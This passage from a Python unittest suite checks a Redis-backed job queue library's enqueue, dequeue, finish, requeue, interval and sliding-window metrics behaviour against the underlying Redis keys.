queue_type=self._test_queue_type,
)
queue_name = '%s:%s:%s' % (
self.queue._key_prefix, self._test_queue_type, self._test_queue_id)
# check if the queue length is two
queue_length = self.queue._r.llen(queue_name)
self.assertEqual(queue_length, 2)
def test_enqueue_second_job_payload_dump(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
payload_map_name = '%s:payload' % (self.queue._key_prefix)
# check if the payload map exists
self.assertTrue(self.queue._r.exists(payload_map_name))
def test_enqueue_second_job_payload_encode_decode(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
payload_map_name = '%s:payload' % (self.queue._key_prefix)
payload_map_key = '%s:%s:%s' % (
self._test_queue_type, self._test_queue_id, job_id)
raw_payload = self.queue._r.hget(payload_map_name, payload_map_key)
# decode the payload from msgpack to dictionary
payload = msgpack.unpackb(raw_payload[1:-1])
self.assertEqual(payload, self._test_payload_2)
def test_enqueue_second_job_interval_map_existence(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
interval_map_name = '%s:interval' % (self.queue._key_prefix)
# check if interval map exists
self.assertTrue(self.queue._r.exists(interval_map_name))
def test_enqueue_second_job_interval_value(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
interval_map_name = '%s:interval' % (self.queue._key_prefix)
interval_map_key = '%s:%s' % (
self._test_queue_type, self._test_queue_id)
interval = self.queue._r.hget(interval_map_name, interval_map_key)
self.assertEqual(interval, '20000') # 20s (20000ms)
def test_enqueue_second_job_ready_set(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
sorted_set_name = '%s:%s' % (
self.queue._key_prefix, self._test_queue_type)
self.assertTrue(self.queue._r.exists(sorted_set_name))
def test_enqueue_second_job_ready_set_contents(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# sleeping for 500ms to ensure that the
# time difference between two enqueues is
# measurable for the test cases.
time.sleep(0.5)
# job 2
job_id = self._get_job_id()
start_time = str(generate_epoch())
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
sorted_set_name = '%s:%s' % (
self.queue._key_prefix, self._test_queue_type)
end_time = str(generate_epoch())
queue_id_list = self.queue._r.zrangebyscore(
sorted_set_name,
start_time,
end_time)
self.assertEqual(len(queue_id_list), 0)
def test_enqueue_second_job_queue_type_ready_set(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
start_time = str(generate_epoch())
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check the queue type ready set.
queue_type_ready_set = self.queue._r.smembers(
'%s:ready:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 1)
self.assertEqual(queue_type_ready_set.pop(), self._test_queue_type)
def test_enqueue_second_job_queue_type_active_set(self):
# job 1
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# job 2
job_id = self._get_job_id()
start_time = str(generate_epoch())
response = self.queue.enqueue(
payload=self._test_payload_2,
interval=20000, # 20s (20000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
queue_type_ready_set = self.queue._r.smembers(
'%s:active:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 0)
def test_dequeue_response_status_failure(self):
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'failure')
def test_dequeue_response_status_success_without_requeue_limit(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
# without requeue limit
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# check all the responses
self.assertEqual(response['status'], 'success')
self.assertEqual(response['queue_id'], self._test_queue_id)
self.assertEqual(response['job_id'], job_id)
self.assertEqual(response['payload'], self._test_payload_1)
self.assertEqual(response['requeues_remaining'], -1) # from the config
def test_dequeue_response_status_success_with_requeue_limit(self):
# with requeue limit passed explicitly
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_5
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# check all the responses
self.assertEqual(response['status'], 'success')
self.assertEqual(response['queue_id'], self._test_queue_id)
self.assertEqual(response['job_id'], job_id)
self.assertEqual(response['payload'], self._test_payload_1)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_5)
def test_dequeue_job_queue_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
queue_name = '%s:%s:%s' % (
self.queue._key_prefix, self._test_queue_type, self._test_queue_id)
self.assertFalse(self.queue._r.exists(queue_name))
def test_dequeue_time_keeper_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# time keeper key should exist
time_keeper_key_name = '%s:%s:%s:time' % (
self.queue._key_prefix,
self._test_queue_type, self._test_queue_id
)
self.assertTrue(self.queue._r.exists(time_keeper_key_name))
def test_dequeue_ready_sorted_set_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# the sorted set should not exists
sorted_set_name = '%s:%s' % (
self.queue._key_prefix, self._test_queue_type)
self.assertFalse(self.queue._r.exists(sorted_set_name))
def test_dequeue_active_sorted_set(self):
job_id = self._get_job_id()
start_time = str(generate_epoch())
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# the job should exist in the active set with the timestamp
# it was picked up with.
active_sorted_set_name = '%s:%s:active' % (
self.queue._key_prefix,
self._test_queue_type
)
end_time = str(generate_epoch())
job_expire_timestamp = str(
int(end_time) + self.queue._job_expire_interval)
job_id_list = self.queue._r.zrangebyscore(
active_sorted_set_name,
start_time,
job_expire_timestamp)
# check if there is exactly one job in the
# active sorted set
self.assertEqual(len(job_id_list), 1)
def test_dequeue_time_keeper_expiry(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=1000, # 1s (1000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# wait for the interval duration and check that the
# time keeper should have expired
time.sleep(self.queue._job_expire_interval / 1000.00) # in seconds
time_keeper_key_name = '%s:%s:%s:time' % (
self.queue._key_prefix,
self._test_queue_type, self._test_queue_id
)
self.assertFalse(self.queue._r.exists(time_keeper_key_name))
def test_dequeue_ready_queue_type_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# the ready queue type set should have 0 items
queue_type_ready_set = self.queue._r.smembers(
'%s:ready:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 0)
def test_dequeue_active_queue_type_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# the active queue type set should have one item
queue_type_ready_set = self.queue._r.smembers(
'%s:active:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 1)
self.assertEqual(queue_type_ready_set.pop(), self._test_queue_type)
def test_dequeue_metrics_global_dequeue_counter(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
counter_value = self.queue._r.get('%s:dequeue_counter:%s' % (
self.queue._key_prefix, timestamp_minute))
self.assertEqual(counter_value, '1')
def test_dequeue_metrics_per_queue_dequeue_counter(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
counter_value = self.queue._r.get('%s:%s:%s:dequeue_counter:%s' % (
self.queue._key_prefix,
self._test_queue_type,
self._test_queue_id,
timestamp_minute))
self.assertEqual(counter_value, '1')
def test_finish_on_empty_queue(self):
job_id = self._get_job_id()
response = self.queue.finish(
job_id=job_id,
queue_id='doesnotexist',
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'failure')
def test_finish_response_status(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'success')
def test_finish_ready_sorted_set_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:%s' % (
self.queue._key_prefix, self._test_queue_type)))
def test_finish_active_sorted_set_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:%s:active' % (
self.queue._key_prefix, self._test_queue_type)))
def test_finish_payload_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:payload' % self.queue._key_prefix))
def test_finish_interval_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:interval' % self.queue._key_prefix))
def test_finish_requeue_limit_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_0
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# mark the job as finished
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:%s:%s:requeues_remaining' % (
self.queue._key_prefix, self._test_queue_type, self._test_queue_id
))
)
def test_finish_job_queue_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
self.assertFalse(
self.queue._r.exists('%s:%s:%s' % (
self.queue._key_prefix, self._test_queue_type, self._test_queue_id)))
def test_finish_time_keeper_expire(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
# convert to seconds.
time.sleep(self.queue._job_expire_interval / 1000.00)
time_keeper_key_name = '%s:%s:%s:time' % (
self.queue._key_prefix,
self._test_queue_type, self._test_queue_id)
self.assertFalse(self.queue._r.exists(time_keeper_key_name))
def test_finish_queue_type_ready_set_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
queue_type_ready_set = self.queue._r.smembers(
'%s:ready:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 0)
def test_finish_queue_type_active_set_existence(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.finish(
job_id=job_id,
queue_id=response['queue_id'],
queue_type=self._test_queue_type
)
queue_type_active_set = self.queue._r.smembers(
'%s:active:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_active_set), 0)
def test_requeue_active_sorted_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
self.assertFalse(
self.queue._r.exists('%s:%s:active' % (
self.queue._key_prefix, self._test_queue_type)))
def test_requeue_queue_type_ready_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
queue_type_ready_set = self.queue._r.smembers(
'%s:ready:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_ready_set), 1)
self.assertEqual(queue_type_ready_set.pop(), self._test_queue_type)
def test_requeue_queue_type_active_set(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
queue_type_active_set = self.queue._r.smembers(
'%s:active:queue_type' % self.queue._key_prefix)
self.assertEqual(len(queue_type_active_set), 0)
def test_requeue_requeue_limit_5(self):
# with requeue limit as 5
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_5
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_5)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_5 - 1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_5 - 2)
def test_requeue_requeue_limit_0(self):
# with requeue limit as 0
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_0
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_0)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'failure')
def test_requeue_requeue_limit_neg_1(self):
# with requeue limit as -1 (requeue infinitely)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
requeue_limit=self._test_requeue_limit_neg_1
)
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_neg_1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_neg_1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_neg_1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
# dequeue from the queue_type
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_neg_1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
# requeue the job
self.queue.requeue()
self.assertEqual(
response['requeues_remaining'], self._test_requeue_limit_neg_1)
# wait until the job expires
time.sleep(self.queue._job_expire_interval / 1000.00)
def test_interval_non_existent_queue(self):
response = self.queue.interval(
interval=1000,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'failure')
interval_map_name = '%s:interval' % (self.queue._key_prefix)
# check if interval map exists
self.assertFalse(self.queue._r.exists(interval_map_name))
def test_interval_existent_queue(self):
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
# check if interval is saved in the appropriate structure
interval_map_name = '%s:interval' % (self.queue._key_prefix)
# check if interval map exists
self.assertTrue(self.queue._r.exists(interval_map_name))
# check the value
interval_map_key = '%s:%s' % (
self._test_queue_type, self._test_queue_id)
interval = self.queue._r.hget(interval_map_name, interval_map_key)
self.assertEqual(interval, '10000')
# set the interval to 5s (5000ms)
response = self.queue.interval(
interval=5000,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type
)
self.assertEqual(response['status'], 'success')
# check if interval is saved in the appropriate structure
interval_map_name = '%s:interval' % (self.queue._key_prefix)
# check if interval map exists
self.assertTrue(self.queue._r.exists(interval_map_name))
# check the value
# check the value
interval_map_key = '%s:%s' % (
self._test_queue_type, self._test_queue_id)
interval = self.queue._r.hget(interval_map_name, interval_map_key)
self.assertEqual(interval, '5000')
def test_metrics_response_status(self):
response = self.queue.metrics()
self.assertEqual(response['status'], 'success')
response = self.queue.metrics(self._test_queue_type)
self.assertEqual(response['status'], 'success')
response = self.queue.metrics(
self._test_queue_type, self._test_queue_id)
self.assertEqual(response['status'], 'success')
def test_metrics_response_queue_types(self):
response = self.queue.metrics()
self.assertEqual(response['queue_types'], [])
self.assertEqual(len(response['enqueue_counts'].values()), 10)
self.assertEqual(sum(response['enqueue_counts'].values()), 0)
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 0)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics()
self.assertEqual(response['queue_types'], [self._test_queue_type])
self.assertEqual(len(response['enqueue_counts'].values()), 10)
self.assertEqual(sum(response['enqueue_counts'].values()), 1)
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 0)
response = self.queue.dequeue(queue_type=self._test_queue_type)
response = self.queue.metrics()
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 1)
def test_metrics_response_queue_ids(self):
response = self.queue.metrics(queue_type=self._test_queue_type)
self.assertEqual(response['queue_ids'], [])
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(queue_type=self._test_queue_type)
self.assertEqual(response['queue_ids'], [self._test_queue_id])
response = self.queue.dequeue(
queue_type=self._test_queue_type
)
response = self.queue.metrics(queue_type=self._test_queue_type)
self.assertEqual(response['queue_ids'], [self._test_queue_id])
def test_metrics_response_enqueue_counts_list(self):
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(len(response['enqueue_counts'].values()), 10)
self.assertEqual(sum(response['enqueue_counts'].values()), 0)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(len(response['enqueue_counts'].values()), 10)
self.assertEqual(sum(response['enqueue_counts'].values()), 1)
def test_metrics_response_dequeue_counts_list(self):
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 0)
response = self.queue.dequeue(queue_type=self._test_queue_type)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 0)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.dequeue(queue_type=self._test_queue_type)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(len(response['dequeue_counts'].values()), 10)
self.assertEqual(sum(response['dequeue_counts'].values()), 1)
def test_metrics_response_queue_length(self):
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(response['queue_length'], 0)
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(response['queue_length'], 1)
response = self.queue.dequeue(queue_type=self._test_queue_type)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
self.assertEqual(response['queue_length'], 0)
def test_metrics_enqueue_sliding_window(self):
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(len(response['enqueue_counts'].values()), 10)
self.assertEqual(sum(response['enqueue_counts'].values()), 0)
self.assertEqual(len(global_response['enqueue_counts'].values()), 10)
self.assertEqual(sum(global_response['enqueue_counts'].values()), 0)
# enqueue a job
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 1)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 1)
# enqueue another job
job_id = self._get_job_id()
response = self.queue.enqueue(
payload=self._test_payload_1,
interval=10000, # 10s (10000ms)
job_id=job_id,
queue_id=self._test_queue_id,
queue_type=self._test_queue_type,
)
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 2)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 2)
# wait for one minute
time.sleep(65) # 65 seconds
# check the last minute value.
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 2)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 2)
# save the old value before overwriting
old_1_timestamp_minute = timestamp_minute
# check the current minute value
timestamp = int(generate_epoch())
# epoch for the minute.
timestamp_minute = str(int(math.floor(timestamp / 60000.0) * 60000))
response = self.queue.metrics(
queue_type=self._test_queue_type, queue_id=self._test_queue_id)
global_response = self.queue.metrics()
self.assertEqual(response['enqueue_counts'][timestamp_minute], 0)
self.assertEqual(
global_response['enqueue_counts'][timestamp_minute], 0)
# enqueue a job in the current minute
